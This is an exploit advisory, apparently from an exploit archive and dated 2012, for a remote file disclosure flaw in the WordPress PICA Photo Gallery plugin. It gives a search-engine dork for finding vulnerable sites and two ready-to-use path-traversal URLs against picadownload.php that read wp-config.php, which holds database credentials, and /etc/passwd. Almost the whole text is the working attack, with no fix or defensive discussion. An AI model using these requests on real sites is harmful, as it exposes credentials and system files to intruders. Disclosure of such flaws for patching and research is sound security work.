id: 18487
date: 06/07/2012
title: Wordpress Plugins - PICA Photo Gallery Remote File Disclosure Vulnerability
author: Sammy FORGIT
cves: 

##################################################
# Description : Wordpress Plugins - PICA Photo Gallery Remote File Disclosure Vulnerability
# Version : 1.0
# Link : http://wordpress.org/extend/plugins/pica-photo-gallery/
# Plugins : http://downloads.wordpress.org/plugin/pica-photo-gallery.zip
# Google Dork : inurl:/wp-content/plugins/pica-photo-gallery/
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################


Exploit :

http://www.exemple.com/wordpress/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php

http://www.exemple.com/wordpress/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../../../../../etc/passwd



#  0day.today [2023-03-23]  #